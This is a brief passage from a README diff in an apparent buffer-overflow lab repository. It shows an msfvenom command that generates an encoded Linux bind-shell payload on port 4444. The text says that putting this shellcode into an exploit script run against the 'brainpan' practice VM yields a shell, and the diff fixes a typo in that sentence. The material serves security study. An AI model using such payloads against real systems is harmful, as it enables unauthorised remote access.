ahsan-aziz/Buffer-Overflow/README.md

 msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00" –e x86/shikata_ga_nai
 ```

 We just replace the shell code and run against the brainpan vm, and we'll be able to get shell.
-For, this code file is uploaded (linux-poc.py).
+This code file is uploaded (linux-poc.py).